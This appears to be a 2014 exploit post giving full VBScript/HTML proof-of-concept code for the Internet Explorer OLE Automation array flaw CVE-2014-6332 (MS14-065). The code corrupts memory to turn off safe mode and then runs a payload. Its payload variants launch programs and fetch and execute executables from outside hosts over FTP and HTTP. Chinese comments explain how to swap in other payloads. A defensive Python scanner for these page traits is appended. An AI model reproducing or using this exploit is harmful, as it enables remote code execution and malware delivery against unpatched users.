MS14-065 PoC in various versions
2014-11-21 13:55
Internet Explorer < 11 - OLE Automation Array Remote Code Execution
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() //修改各种版本修改这个函数的内容就可以了 On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" //ftp版本 shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe" // //http下载版本 objWsh.run "cmd.exe /c echo >>d:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>d:\text.vbs xPost.Open ""GET"",""http://172.16.22.100/putty.exe"",0 & echo >>d:\text.vbs xPost.Send() & echo >>d:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>d:\text.vbs sGet.Mode=3 & echo >>d:\text.vbs sGet.Type=1 & echo >>d:\text.vbs sGet.Open() & echo >>d:\text.vbs sGet.Write xPost.ResponseBody & echo >>d:\text.vbs sGet.SaveToFile ""d:\putty.exe"",2",0 objWsh.run "cscript.exe d:\text.vbs",0,true wscript.sleep 10000 objWsh.run "d:\putty.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") 
document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>
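Added example, not part of the original post: a static triage check for HTML pages that looks for the traits visible in the PoC text above (forced legacy document mode, error suppression, one array redimensioned with two different variable bounds, a hex literal of &h8000000 or more, and `Shell.Application`). The function name, trait names, verdict rule and both sample inputs are assumptions constructed for illustration.

```python
import re

# Traits are read off the PoC text on this page; trait names and verdict rule are assumptions.
VBS_BLOCK = re.compile(
    r"<script[^>]*language\s*=\s*[\"']?vbscript[\"']?[^>]*>(.*?)</script>", re.I | re.S)
LEGACY_MODE = re.compile(r"X-UA-Compatible[^>]*IE\s*=\s*EmulateIE\d+", re.I)
REDIM = re.compile(r"redim\s+preserve\s+(\w+)\s*\(\s*([A-Za-z_]\w*)\s*\)", re.I)
HEX_LIT = re.compile(r"&h([0-9a-f]+)", re.I)
SHELL = re.compile(r'createobject\s*\(\s*"Shell\.Application"', re.I)
SUPPRESS = re.compile(r"on\s+error\s+resume\s+next", re.I)

# Constructed sample inputs (inert fragments, not the PoC itself).
SAMPLE_FLAGGED = '''<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
<SCRIPT LANGUAGE="VBScript">
On Error Resume Next
a2=a0+&h8000000
redim Preserve aa(a0)
redim Preserve aa(a2)
set shell=createobject("Shell.Application")
</script>'''
SAMPLE_BENIGN = '''<script language="VBScript">
dim items()
redim Preserve items(10)
</script>'''

def scan_html(html):
    """Return (verdict, sorted trait names) for one HTML document."""
    hits = set()
    if LEGACY_MODE.search(html):
        hits.add("legacy_doc_mode")
    vbs = "\n".join(VBS_BLOCK.findall(html))  # only VBScript bodies are inspected
    if SUPPRESS.search(vbs):
        hits.add("errors_suppressed")
    if SHELL.search(vbs):
        hits.add("shell_application")
    # One array redimensioned with two or more different variable bounds.
    bounds = {}
    for array, bound in REDIM.findall(vbs):
        bounds.setdefault(array.lower(), set()).add(bound.lower())
    if any(len(b) >= 2 for b in bounds.values()):
        hits.add("redim_toggle")
    # A hex literal of 0x8000000 or more, as used for the oversized bound.
    if any(int(h, 16) >= 0x8000000 for h in HEX_LIT.findall(vbs)):
        hits.add("huge_bound")
    # Verdict rule (assumption): both array traits must be present together.
    verdict = "suspicious" if {"redim_toggle", "huge_bound"} <= hits else "clean"
    return verdict, sorted(hits)

if __name__ == "__main__":
    print(scan_html(SAMPLE_FLAGGED), scan_html(SAMPLE_BENIGN))
```

The remaining traits are reported for analyst context only; they do not change the verdict on their own.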